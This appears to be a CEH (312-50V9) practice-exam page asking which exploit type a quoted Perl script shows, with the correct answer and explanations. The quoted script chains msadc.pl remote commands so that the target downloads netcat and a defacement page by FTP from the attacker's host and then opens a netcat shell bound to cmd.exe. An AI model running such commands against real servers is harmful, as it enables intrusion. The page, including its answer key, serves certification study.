nerdexam
EC-Council

312-50V9 · Question #76

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On furth

The correct answer is B. A chained exploit. The script demonstrates a chained exploit by linking multiple sequential msadc.pl calls to build an FTP command file and then use it to download additional attack tools.

Hacking Web Servers

Question

A tester has been using the msadc.pl attack script to execute arbitrary commands on a Windows NT4 web server. While it is effective, the tester finds it tedious to perform extended functions. On further research, the tester come across a perl script that runs the following msadc functions:

system("perl msadc.pl -h $host -C "echo open $your >testfile""); system("perl msadc.pl -h $host -C "echo $user>>testfile""); system("perl msadc.pl -h $host -C "echo $pass>>testfile""); system("perl msadc.pl -h $host -C "echo bin>>testfile""); system("perl msadc.pl -h $host -C "echo get nc.exe>>testfile""); system("perl msadc.pl -h $host -C "echo get hacked.html>>testfile""); ("perl msadc.pl -h $host -C "echo quit>>testfile""); system("perl msadc.pl -h $host -C "ftp -s:testfile""); $o=; print "Opening ...\n"; system("perl msadc.pl -h $host -C "nc -l -p $port -e cmd.exe""); Which exploit is indicated by this script?

Options

  • AA buffer overflow exploit
  • BA chained exploit
  • CA SQL injection exploit
  • DA denial of service exploit

How the community answered

(15 responses)
  • A
    7% (1)
  • B
    73% (11)
  • C
    7% (1)
  • D
    13% (2)

Why each option

The script demonstrates a chained exploit by linking multiple sequential msadc.pl calls to build an FTP command file and then use it to download additional attack tools.

AA buffer overflow exploit

A buffer overflow exploit overwrites adjacent memory to hijack execution flow, which is not demonstrated anywhere in this script.

BA chained exploitCorrect

A chained exploit combines multiple individual techniques or vulnerabilities in sequence to achieve a goal that none could accomplish alone. Here, the attacker chains repeated msadc.pl remote command executions to incrementally write an FTP script file ('testfile'), then invokes FTP with that script to pull down nc.exe and hacked.html - each step depending on the prior one to succeed.

CA SQL injection exploit

A SQL injection exploit manipulates database query strings to extract or modify data, and no SQL statements or database interactions appear in this script.

DA denial of service exploit

A denial of service exploit floods a target with traffic or requests to make it unavailable, whereas this script is focused on gaining remote code execution and downloading files.

Concept tested: Chained exploit technique using sequential remote commands

Source: https://csrc.nist.gov/glossary/term/exploit

Topics

#chained exploit#MSADC#netcat#exploit scripting

Community Discussion

No community discussion yet for this question.

Full 312-50V9 Practice